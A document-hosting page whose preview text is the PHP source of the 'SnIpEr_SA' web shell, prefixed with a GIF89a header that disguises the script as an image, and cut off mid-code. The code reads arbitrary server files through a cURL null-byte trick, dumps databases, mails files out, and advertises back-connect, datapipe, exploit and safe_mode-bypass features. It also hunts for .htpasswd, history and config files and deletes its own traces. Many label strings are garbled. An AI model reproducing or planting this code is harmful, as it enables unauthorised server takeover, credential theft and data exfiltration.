Nh

October 2019
PDF

Download

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA

Overview

Download & View Nh as PDF for free.

More details

Words: 7,092
Pages: 49

Preview
Full text

GIF89a;
/********************************************************************************* *********************/ if(empty($_POST['SnIpEr_SA'])){ } else { $m=$_POST['SnIpEr_SA']; $ch = curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); curl_exec($ch); var_dump(curl_exec($ch)); } echo "".htmlspecialchars($m).""; error_reporting(0); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $safe_mode = @ini_get('safe_mode'); $version = '1.31'; if(version_compare(phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="SnIpEr_SA"'); header('HTTP/1.0 401 Unauthorized'); exit("SnIpEr_SA : Access Denied"); } } $head = ' <meta http-equiv="Content-Language" content="ar-sa"> <meta name="GENERATOR" content="Microsoft FrontPage 6.0"> <meta name="ProgId" content="FrontPage.Editor.Document"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> SnIpEr_SA shell

<STYLE> BODY { SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBARARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010 } tr { BORDER-RIGHT: #aaaaaa 2px solid; BORDER-TOP: #eeeeee 2px solid; BORDER-LEFT: #eeeeee 2px solid; BORDER-BOTTOM: #aaaaaa 2px solid; color: #ffffff; } td { BORDER-RIGHT: #aaaaaa 2px solid; BORDER-TOP: #eeeeee 2px solid; BORDER-LEFT: #eeeeee 2px solid; BORDER-BOTTOM: #aaaaaa 2px solid; color: #cccccc; } .table1 { BORDER: 1px; BACKGROUND-COLOR: #333333; color: #333333; } .td1 { BORDER: 1px; font: 7pt tahoma; color: #ffffff; } .tr1 { BORDER: 1px; color: #2279D9; } table { BORDER: #eeeeee 2px outset; BACKGROUND-COLOR: #272727; color: #2279D9; } input { BORDER-RIGHT: #ffffff 2px solid; BORDER-TOP: #999999 2px solid; BORDER-LEFT: #999999 2px solid; BORDER-BOTTOM: #ffffff 2px solid; BACKGROUND-COLOR: #800000; font: 9pt tahoma; color: #ffffff; } select { BORDER-RIGHT: #ffffff 2px solid; BORDER-TOP: #999999 2px solid; BORDER-LEFT: #999999 2px solid; BORDER-BOTTOM: #ffffff 2px solid; BACKGROUND-COLOR: #000000; font: 9pt tahoma;

color: #CCCCCC;; } submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: #272727; width: 40%; color: #2279D9; } textarea { BORDER-RIGHT: #ffffff 2px solid; BORDER-TOP: #999999 2px solid; BORDER-LEFT: #999999 2px solid; BORDER-BOTTOM: #ffffff 2px solid; BACKGROUND-COLOR: #3D3D3D; font: Fixedsys bold; color: #ffffff; } BODY { margin: 2px; color: #2279D9; background-color: #000000; } A:link {COLOR:red; TEXT-DECORATION: none} A:visited { COLOR:red; TEXT-DECORATION: none} A:active {COLOR:red; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} <script language=\'javascript\'> function hide_div(id) { document.getElementById(id).style.display = \'none\'; document.cookie=id+\'=0;\'; } function show_div(id) { document.getElementById(id).style.display = \'block\'; document.cookie=id+\'=1;\'; } function change_divst(id) { if (document.getElementById(id).style.display == \'none\') show_div(id); else hide_div(id); } '; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1;

$timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() {

$data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $from\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name=\"".$attach['name']."\"\r\n"; $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; if(@mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = 'localhost'; var $port = '';

var var var var var var var var var var var var

$user = ''; $pass = ''; $base = ''; $db = ''; $connection; $res; $error; $rows; $columns; $num_rows; $num_fields; $dump;

function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this>user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this>user,$this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break;

case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; } return 0;

}

function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this>connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error'; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; }

break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this>num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL':

return 0;

$this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1)

if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;

if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this>columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this>columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this>columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection);

break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }

} function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; } } } if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && ! empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "

[ BACK ]

"; die(); } if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query") { echo $head;

$sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo ''; if(!$sql->connect()) echo "

Can't connect to SQL server

"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "

Can't select database

"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
"; switch($sql->query($query)) { case '0': echo "

Error : ".$sql->error."

"; break; case '1': if($sql->get_result()) { echo ""; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode(" "; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode(" '; } echo "

", $sql->columns); echo "

".$keys."

",$sql->rows[$i]); echo '

'.$values.'

"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "

affected rows : ".$ar."

"; break; } }

} }

} echo "
"; echo "

[ BACK ]

"; die(); } if(isset($_GET['delete'])) { @unlink(__FILE__); } if(isset($_GET['tmp'])) { @unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); } if(isset($_GET['phpini'])) { echo $head; function U_value($value) { if ($value == '') return 'no value'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);

} if (@function_exists('ini_get_all')) { $r = ''; echo '', ''; foreach (@ini_get_all() as $key=>$value) { $r .= ''; } echo $r; echo '

Directive	Local Value	Master Value
'.ws(3).''.$key.'	'.U_value($value['local_value']).'	'.U_value($value['global_value']).'

'; } echo "

[ BACK ]

"; die(); } if(isset($_GET['cpu'])) { echo $head; echo '

CPU

'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '

'.ws(3).''.trim($info[0]).'	'.trim($info[1]).'
'.ws(3).' --

'; echo "

[ BACK ]

"; die(); } if(isset($_GET['mem'])) { echo $head; echo '

face=tahoma size=-2 color=red>MEMORY

'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= ''; } echo $r; } else { echo ''; } echo '

'.ws(3).''.trim($info[0]).'	'.trim($info[1]).'
'.ws(3).' --

'; echo "

[ BACK ]

"; die(); } $lang=array( 'ru_text1' =>'??????????? ???????', 'ru_text2' =>'?????????? ?????? ?? ???????', 'ru_text3' =>'????????? ???????', 'ru_text4' =>'??????? ??????????', 'ru_text5' =>'???????? ?????? ?? ??????', 'ru_text6' =>'????????? ????', 'ru_text7' =>'??????', 'ru_text8' =>'???????? ?????', 'ru_butt1' =>'?????????', 'ru_butt2' =>'?????????', 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', 'ru_text10'=>'??????? ????', 'ru_text11'=>'?????? ??? ???????', 'ru_butt3' =>'???????', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-?????', 'ru_text14'=>'????', 'ru_butt4' =>'?????????', 'ru_text15'=>'???????? ?????? ? ?????????? ???????', 'ru_text16'=>'????????????', 'ru_text17'=>'????????? ????', 'ru_text18'=>'????????? ????', 'ru_text19'=>'Exploits', 'ru_text20'=>'????????????', 'ru_text21'=>'????? ???', 'ru_text22'=>'datapipe', 'ru_text23'=>'????????? ????', 'ru_text24'=>'????????? ????', 'ru_text25'=>'????????? ????', 'ru_text26'=>'????????????', 'ru_butt5' =>'?????????',

'ru_text28'=>'?????? ? safe_mode', 'ru_text29'=>'?????? ????????', 'ru_butt6' =>'???????', 'ru_text30'=>'???????? ?????', 'ru_butt7' =>'???????', 'ru_text31'=>'???? ?? ??????', 'ru_text32'=>'?????????? PHP ????', 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', 'ru_butt8' =>'?????????', 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', 'ru_text36'=>'???? . ???????', 'ru_text37'=>'?????', 'ru_text38'=>'??????', 'ru_text39'=>'????', 'ru_text40'=>'???? ??????? ???? ??????', 'ru_butt9' =>'????', 'ru_text41'=>'????????? ? ?????', 'ru_text42'=>'?????????????? ?????', 'ru_text43'=>'????????????? ????', 'ru_butt10'=>'?????????', 'ru_butt11'=>'?????????????', 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', 'ru_text45'=>'???? ????????', 'ru_text46'=>'???????? phpinfo()', 'ru_text47'=>'???????? ???????? php.ini', 'ru_text48'=>'???????? ????????? ??????', 'ru_text49'=>'???????? ??????? ? ???????', 'ru_text50'=>'?????????? ? ??????????', 'ru_text51'=>'?????????? ? ??????', 'ru_text52'=>'????? ??? ??????', 'ru_text53'=>'?????? ? ?????', 'ru_text54'=>'????? ?????? ? ??????', 'ru_butt12'=>'?????', 'ru_text55'=>'?????? ? ??????', 'ru_text56'=>'?????? ?? ???????', 'ru_text57'=>'???????/??????? ????/??????????', 'ru_text58'=>'???', 'ru_text59'=>'????', 'ru_text60'=>'??????????', 'ru_butt13'=>'???????/???????', 'ru_text61'=>'???? ??????', 'ru_text62'=>'?????????? ???????', 'ru_text63'=>'???? ??????', 'ru_text64'=>'?????????? ???????', 'ru_text65'=>'???????', 'ru_text66'=>'???????', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'???????', 'ru_text69'=>'????????1', 'ru_text70'=>'????????2', 'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",

'ru_text72'=>'????? ??? ??????', 'ru_text73'=>'?????? ? ?????', 'ru_text74'=>'?????? ? ??????', 'ru_text75'=>'* ????? ???????????? ?????????? ?????????', 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', 'ru_text80'=>'???', 'ru_text81'=>'????', 'ru_text82'=>'???? ??????', 'ru_text83'=>'?????????? SQL ???????', 'ru_text84'=>'SQL ??????', 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', 'ru_text86'=>'?????????? ????? ? ???????', 'ru_butt14'=>'???????', 'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', 'ru_text88'=>'FTP-??????:????', 'ru_text89'=>'???? ?? ftp ???????', 'ru_text90'=>'????? ????????', 'ru_text91'=>'???????????? ?', 'ru_text92'=>'??? ?????????', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-????????', 'ru_text95'=>'?????? ?????????????', 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', 'ru_text97'=>'????????? ??????????: ', 'ru_text98'=>'??????? ???????????: ', 'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', 'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', 'ru_text102'=>'?????', 'ru_text103'=>'???????? ??????', 'ru_text104'=>'???????? ????? ?? ???????? ????', 'ru_text105'=>'????', 'ru_text106'=>'??', 'ru_text107'=>'????', 'ru_butt15'=>'?????????', 'ru_text108'=>'????? ??????', 'ru_text109'=>'????????', 'ru_text110'=>'??????????', 'ru_text111'=>'SQL-?????? : ????', 'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail', 'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list', 'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body', 'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()', 'ru_text116'=>'?????????? ????', 'ru_text117'=>'?', 'ru_text118'=>'???? ??????????', 'ru_text119'=>'?? ??????? ??????????? ????', 'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', 'ru_err1'=>'??????! ?? ???? ????????? ???? ', 'ru_err2'=>'??????! ?? ??????? ??????? ', 'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',

'ru_err4'=>'?????? ??????????? ?? ftp ???????', 'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', 'ru_err6'=>'??????! ?? ??????? ????????? ??????', 'ru_err7'=>'?????? ??????????', /* --------------------------------------------------------------- */ 'eng_text1' =>'�� ', 'eng_text2' =>'�� ', 'eng_text3' =>'�� ', 'eng_text4' =>'�� ', 'eng_text5' =>'�� ', 'eng_text6' =>'�� ', 'eng_text7' =>'�� ', 'eng_text8' =>'�� ', 'eng_butt1' =>'��', 'eng_butt2' =>'��', 'eng_text9' =>'�� /bin/bash', 'eng_text10'=>'��', 'eng_text11'=>'�� ', 'eng_butt3' =>'��', 'eng_text12'=>'�� ', 'eng_text13'=>'�� ', 'eng_text14'=>'��', 'eng_butt4' =>'��', 'eng_text15'=>'�� ', 'eng_text16'=>'�� ', 'eng_text17'=>'�� ', 'eng_text18'=>'�� ', 'eng_text19'=>'Exploits', 'eng_text20'=>'��', 'eng_text21'=>' �� ', 'eng_text22'=>'�� ', 'eng_text23'=>'�� ', 'eng_text24'=>'�� ', 'eng_text25'=>'�� ', 'eng_text26'=>'��', 'eng_butt5' =>'��', 'eng_text28'=>'�� ', 'eng_text29'=>'�� ', 'eng_butt6' =>'��', 'eng_text30'=>'�� ', 'eng_butt7' =>'��', 'eng_text31'=>'�� ', 'eng_text32'=>'�� php �� eval', 'eng_text33'=>'Test bypass open_basedir with cURL functions', 'eng_butt8' =>'��', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'�� . ��', 'eng_text37'=>'�� ', 'eng_text38'=>'�� ', 'eng_text39'=>'��', 'eng_text40'=>'�� ', 'eng_butt9' =>'��', 'eng_text41'=>'�� ', 'eng_text42'=>'�� ', 'eng_text43'=>'�� ', 'eng_butt10'=>'��', 'eng_text44'=>'�� ',

'eng_text45'=>'�� ', 'eng_text46'=>'�� phpinfo()', 'eng_text47'=>'�� php.ini', 'eng_text48'=>'�� temp', 'eng_butt11'=>'�� ', 'eng_text49'=>'�� ', 'eng_text50'=>'�� ', 'eng_text51'=>'�� ', 'eng_text52'=>'�� ', 'eng_text53'=>'�� ', 'eng_text54'=>'�� ', 'eng_butt12'=>'��', 'eng_text55'=>'�� ', 'eng_text56'=>'�� :(', 'eng_text57'=>'��/�� /��', 'eng_text58'=>'��', 'eng_text59'=>'��', 'eng_text60'=>'��', 'eng_butt13'=>'�� /��', 'eng_text61'=>'�� ', 'eng_text62'=>'�� ', 'eng_text63'=>'�� ', 'eng_text64'=>'�� ', 'eng_text65'=>'��', 'eng_text66'=>'��', 'eng_text67'=>'��/��/��', 'eng_text68'=>'��', 'eng_text69'=>'�� ', 'eng_text70'=>'��', 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", 'eng_text72'=>'�� ', 'eng_text73'=>'�� ', 'eng_text74'=>'�� ', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'�� find', 'eng_text80'=>'��', 'eng_text81'=>'��', 'eng_text82'=>'�� ', 'eng_text83'=>'�� ', 'eng_text84'=>'�� ', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'�� ', 'eng_butt14'=>'��', 'eng_text87'=>'�� ', 'eng_text88'=>'�� :��', 'eng_text89'=>'�� ', 'eng_text90'=>'�� ', 'eng_text91'=>'��', 'eng_text92'=>'�� ', 'eng_text93'=>'�� ', 'eng_text94'=>'�� ', 'eng_text95'=>'�� ', 'eng_text96'=>'�� ', 'eng_text97'=>'�� : ', 'eng_text98'=>'�� : ', 'eng_text99'=>'* �� /etc/passwd �� ftp', 'eng_text100'=>'�� ',

'eng_text101'=>'�� ', 'eng_text102'=>'�� ', 'eng_text103'=>'�� ', 'eng_text104'=>'�� ', 'eng_text105'=>'��', 'eng_text106'=>'��', 'eng_text107'=>'��', 'eng_butt15'=>'��', 'eng_text108'=>'��', 'eng_text109'=>'��', 'eng_text110'=>'��', 'eng_text111'=>'�� : ��', 'eng_text112'=>'�� mb_send_mail', 'eng_text113'=>'�� via imap_list', 'eng_text114'=>'�� via imap_body', 'eng_text115'=>'�� compress.zlib://', 'eng_text116'=>'�� ', 'eng_text117'=>'��', 'eng_text118'=>'�� ', 'eng_text119'=>'�� ', 'eng_err0'=>'�� ! �� ', 'eng_err1'=>'�� ! �� ', 'eng_err2'=>'��! �� ', 'eng_err3'=>'��! �� ', 'eng_err4'=>'�� ! �� ', 'eng_err5'=>'�� ! �� ', 'eng_err6'=>'�� ! �� ', 'eng_err7'=>'�� ', 'eng_text200'=>'�� copy()', 'eng_text202'=>'�� ', 'eng_text300'=>'�� curl()', 'eng_text302'=>'�� ', ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( '�� suid'=>'find / -type f -perm -04000 -ls', '�� suid �� '=>'find . -type f -perm -04000 -ls', '�� suid'=>'find / -type f -perm -02000 -ls', '�� suid �� '=>'find . -type f -perm -02000 -ls', '�� config.inc.php'=>'find / -type f -name config.inc.php', '�� config.inc.php �� '=>'find . -type f -name config.inc.php', '�� config* �� '=>'find / -type f -name "config*"', '�� config* �� '=>'find . -type f -name "config*"', '�� '=>'find / -type f -perm -2 -ls', '�� '=>'find . -type f -perm -2 -ls', '�� '=>'find / -type d -perm -2 -ls', '�� '=>'find . -type d -perm -2 -ls', '�� '=>'find / -perm -2 -ls', '�� '=>'find . -perm -2 -ls', '�� service.pwd'=>'find / -type f -name service.pwd',

'�� service.pwd �� '=>'find . -type f -name service.pwd', '�� .htpasswd'=>'find / -type f -name .htpasswd', '�� '=>'find . -type f -name .htpasswd', '�� .bash_history'=>'find / -type f -name .bash_history', '�� .bash_history �� '=>'find . -type f -name .bash_history', '�� .mysql_history'=>'find / -type f -name .mysql_history', '�� .mysql_history �� '=>'find . -type f -name .mysql_history', '�� .fetchmailrc'=>'find / -type f -name .fetchmailrc', '�� .fetchmailrc �� '=>'find . -type f -name .fetchmailrc', '�� '=>'lsattr -va', '�� '=>'netstat -an | grep -i listen', '�� '=>'cat /etc/fstab', '�� '=>'cat /var/cpanel/accounting.log', '---------------------------------------------------------------------------------------------------'=>'ls -la' ); $table_up1 = ":: "; $table_up2 = " ::
